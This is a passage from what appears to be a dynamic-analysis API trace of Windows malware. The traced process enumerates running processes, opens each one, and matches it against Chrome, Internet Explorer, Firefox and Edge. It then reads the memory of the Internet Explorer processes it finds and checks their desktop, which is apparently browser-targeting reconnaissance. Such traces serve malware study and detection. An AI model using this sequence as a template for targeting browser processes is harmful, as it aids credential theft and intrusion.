	[0200.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.153] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.153] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0200.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.154] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.154] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0200.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1b60
	[0200.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.155] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0200.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.155] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.155] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0200.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.156] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.156] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0200.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1b64
	[0200.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.157] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0200.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.157] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.158] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0200.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.158] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.159] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0200.160] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1b68
	[0200.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.160] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0200.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.160] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.160] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0200.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.160] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.161] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0200.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1b6c
	[0200.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.162] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0200.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.162] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.162] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0200.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.163] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.163] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0200.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1b70
	[0200.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.172] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0200.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.172] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.173] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0200.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.173] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.173] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0200.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1b74
	[0200.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.174] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0200.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.175] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.175] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0200.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.175] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.175] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0200.176] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1b78
	[0200.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.176] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0200.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.176] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.177] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0200.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.177] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.177] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0200.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1b7c
	[0200.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.178] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0200.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.179] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.179] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0200.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.180] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.181] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0200.181] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1b80
	[0200.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.182] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0200.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.182] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.183] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0200.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.183] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.184] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0200.184] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1b84
	[0200.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.185] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0200.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.185] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.186] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0200.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.186] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.186] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0200.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1b88
	[0200.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.187] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0200.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.188] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.188] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0200.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.189] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.189] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0200.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1b8c
	[0200.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.190] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0200.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.191] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.191] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0200.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.192] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.192] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0200.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1b90
	[0200.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.193] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0200.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.193] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0200.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.193] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0200.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.194] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.194] NtQueryInformationProcess (in: ProcessHandle=0x1b90, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0200.194] ReadProcessMemory (in: hProcess=0x1b90, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0200.194] ReadProcessMemory (in: hProcess=0x1b90, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0200.194] ReadProcessMemory (in: hProcess=0x1b90, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0200.194] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0200.194] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0200.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1b94
	[0200.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.195] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0200.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.195] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0200.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.196] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0200.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.196] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.196] NtQueryInformationProcess (in: ProcessHandle=0x1b94, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0200.196] ReadProcessMemory (in: hProcess=0x1b94, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0200.196] ReadProcessMemory (in: hProcess=0x1b94, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0200.196] ReadProcessMemory (in: hProcess=0x1b94, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0200.197] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0200.197] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0200.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1b98
	[0200.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.197] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0200.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.198] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.198] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0200.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.198] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.199] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0200.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1b9c
	[0200.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.199] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0200.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.200] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.200] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0200.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.200] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.201] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1ba0
	[0200.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.201] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.202] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.202] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.202] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.202] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.203] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0200.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1ba4
	[0200.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.204] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.204] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.205] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.205] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.205] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1ba8
	[0200.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.206] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.206] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.206] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.207] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.207] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0200.208] CloseHandle (hObject=0x188) returned 1
	[0200.208] Sleep (dwMilliseconds=0x64) 
	[0200.305] GetCurrentProcessId () returned 0x110
	[0200.305] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0200.312] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0200.313] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0200.315] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0200.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1bac
	[0200.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.316] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.317] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.317] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.317] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.318] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1bb0
	[0200.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.318] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.319] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.319] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.319] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
